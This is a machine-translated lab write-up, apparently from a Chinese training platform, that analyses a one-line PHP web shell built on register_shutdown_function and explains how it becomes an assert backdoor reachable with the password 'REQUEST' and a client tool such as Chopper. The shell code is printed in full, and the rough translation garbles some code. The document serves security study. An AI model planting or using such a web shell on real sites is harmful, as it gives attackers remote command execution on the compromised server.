WebShell code analysis traceable (X)
First, a word sample deformation horse
<?php $e = $_REQUEST['e'];register_shutdown_function($e, $_REQUEST['REQUEST']);?>
Second, code analysis
1, to adjust the code format
2, analysis code
1, first receives the value of the parameter e used REQUEST method url, then register_shutdown_function function, in fact, this is a callback function, after running the above code, executed again.
Note: The function register_shutdown_function () function is used to register will be executed when a suspension of PHP
Reference: https://www.php.net/manual/zh/function.register-shutdown-function.php
https://www.jianshu.com/p/2bbbbeca62c8
2, the first implementation $ e = $ _REQUEST [ 'e'], then perform $ _REQUEST [ 'REQUEST'], is configured at this time e = assert, the $ _REQUEST [ 'REQUEST'] as an argument to the callback $ E, it is constructed word Trojan <php assert ($ _ REQUEST [ 'REQUEST']);??>
3, this case can be connected using a kitchen knife, password REQUEST
Third, the vulnerability environment to build
1, here using an experimental environment (WebShell code analysis traceable (Question 9)) online learning platform Mozi School, address: https://www.mozhe.cn/bug/detail/UTRuVFZxaWxzVE9PUGthdlYyd0E3dz09bW96aGUmozhe
2, code environment, download the code
3, analysis (analysis above has been passed)
4, connection using chopper
5, to execute commands